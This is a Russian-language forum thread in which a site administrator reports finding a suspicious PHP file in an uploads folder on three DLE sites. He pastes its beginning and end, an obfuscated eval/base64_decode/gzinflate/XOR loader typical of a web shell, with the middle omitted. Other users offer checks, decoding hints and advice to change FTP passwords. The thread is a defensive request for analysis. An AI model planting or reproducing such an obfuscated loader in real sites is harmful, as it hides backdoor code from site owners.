Langly 7 Опубликовано: 31 декабря 2009 Рассказать Опубликовано: 31 декабря 2009 (изменено) Нашел в папке /uploads/fotos файл с именем foto_868.php дата создания 30.12.2009 14:35:00 в файле шифрованный код. Нашел на 3-х сайтах. Файл не скриптом созданный. Комп проверил касперычем+прогой http://www.safer-networking.org/ru/home/index.html ничерта не нашел - все чисто. Файлы, в которых антивирус нашел различия все скачал и сравнил и дефолтными. Все изменения я делал сам, ничего подозрительного не нашел. Всю ночь рылся, так ничего не надыбал. Черт возьми, как это Г на 3 сайта попало??? Есть ли возможность расшифровать или хотя бы понять, что там в этом php файле? То есть что он делает, для чего предназначен? Вот его начало и конец, если кому надо, скину целиком: <?php $o="TJ3HjuPclmYHdV/kckDgR6EaZKMH9N5BFB... далее целая страница этой шифрованной хрени и заканчивается так ...WCoTNaEOy6cQQpaAFh+X///PPP///7n38B";eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhVV2sxbFMyUk9jVzQ5SjJKaGMyVTJORjlrWldOdlpHVW5Pdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoSlEwOHdTVUpaVFU0OUozTjBjbXhsYmljNyIpKTskbz1nemluZmxhdGUoJHhUWk1lS2ROcW4oJG8pKTskeDZ0WFNxSzJKaD0keElDTzBJQllNTigkbyk7Zm9yKCR4cFBxZ1RUNGk3PTA7JHhwUHFnVFQ0aTc8JHg2dFhTcUsySmg7JHhwUHFnVFQ0aTcrKyl7JHhsMndLRWVLWDIuPWNocihvcmQoJG9bJHhwUHFnVFQ0aTddKV45KTt9ZXZhbCgkeGwyd0tFZUtYMik7"));return;?> Есть соображения у кого? PS Сделано именно под дле, судя из имени файла. Изменено 31 декабря 2009 пользователем Langly Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 31 декабря 2009 Рассказать Опубликовано: 31 декабря 2009 проверил 5 сайтов, все чисто, скорее всего у тебя локальная проблема Цитата Ссылка на сообщение Поделиться на других сайтах
abasive 41 Опубликовано: 31 декабря 2009 Рассказать Опубликовано: 31 декабря 2009 у меня тоже чисто в папку uploads/fotos там аватары пользователей, и php файл невозможно туда загрузить попробуйте открыть файл посматрите что показывает www.site.ru/uploads/fotos/foto_868.php Цитата Ссылка на сообщение Поделиться на других сайтах
axit 0 Опубликовано: 3 января 2010 Рассказать Опубликовано: 3 января 2010 (изменено) Скинь полный файл. Или дешифруй сам с помощью _base64.ru (там несколько раз шифровали по частям а потом все вместе). Изменено 3 января 2010 пользователем axit Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 5 января 2010 Рассказать Опубликовано: 5 января 2010 Меняй пароли от фтп... Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.